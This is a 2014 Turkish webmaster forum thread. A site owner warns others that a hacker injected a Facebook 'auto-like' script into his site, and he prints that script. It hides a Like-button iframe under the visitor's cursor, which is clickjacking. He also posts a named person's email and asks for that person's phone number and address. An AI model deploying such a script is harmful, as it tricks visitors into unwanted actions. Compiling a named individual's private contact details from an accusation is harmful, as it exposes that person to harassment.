• 13-02-2014, 21:25:33
    #1
    Arkadaşlar 2 defadır nerden girdiğini henüz bulamadığım şereften yoksun o.ç. teki siteme Facebook otolike kodu ekliyor. Facebook sayfasından sayfa sahibine ulaştım o yapmıştır diye. Adam ben parayla facebook sayfa kasma işi almıştım o adam yapmıştır muhtemelen dedi. Sizde sitelerinizi kontrol edin şöyle bir kodla karşılaşırsanız kaldırın.

    Hackle siteye otolike kodu yükleyen kişinin mail adresini facebook sayfa sahibi paylaştı şimdi. 50 tl karşılıgında bu işi yapıyormuş.

    Mail + Skype: aspdestek@hotmail.com.tr

    Bu adresi tanıyan bilen gören varsa acilen bana ulaşsın rica ediyorum.

    Güncelleme: Mail adresini arattığımda Murat Aydın denen bir şerefsize ait oldugunu öğrendim. Herhangi bir iletişim bilgisini bilen varsa paylaşırsa sevinirim. (Tel adres vs.)

    <script type="text/javascript">$(document).on('mousemove',function(e){	$('#zorlaguzellik').css("left",e.pageX - 18); $('#zorlaguzellik').css("top",e.pageY - 4); setTimeout(function(){$('#zorlaguzellik').html('');}, 5000);});</script><div id="zorlaguzellik" style="width: 45px;opacity:0;position:fixed;z-index:999;overflow:hidden;"> <iframe src="http://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Fcilginkeps&amp;width&amp;layout=button_count&amp;action=like&amp;show_faces=false&amp;share=false&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;margin-left: -20px;" allowTransparency="true"></iframe></div>
  • 13-02-2014, 21:30:04
    #2
    yine ucu murat aydına dayandı. artık her dolandırıcılık işi yapan murat aydın adınımuı kullanıyor nedir ?
  • 13-02-2014, 21:30:58
    #3
    Murat aydın demişler burdakiler
    http://www.webmastersitesi.com/1592156.16
  • 13-02-2014, 21:35:18
    #4
    Valla her ne yapıyorsa bilmiyorum artık sitemde böyle bir koda rastladım kaç gündür yada saattir var emin değilim. 2. defadır aynı kodu koydu aynı ********. İlk eklediginde o facebook sayfası 300 beğenisi vs. vardı şimdi baktım 15k beğenisi var başka sürüyle insanında sitesinde bu kod ekli olma ihtimali %99 o nedenle sitelerinizi kontrol edin arkadaşlar.
  • 30-05-2014, 05:43:50
    #5
    Üyeliği durduruldu
    Hortlatıyorum fakat, iletişim bilgilerine buradan ulaşabilirsiniz, ayrıca sorununuz devam ediyorsa, iletişime geçerseniz ücretsiz destek sağlayabilirim bu konuda size.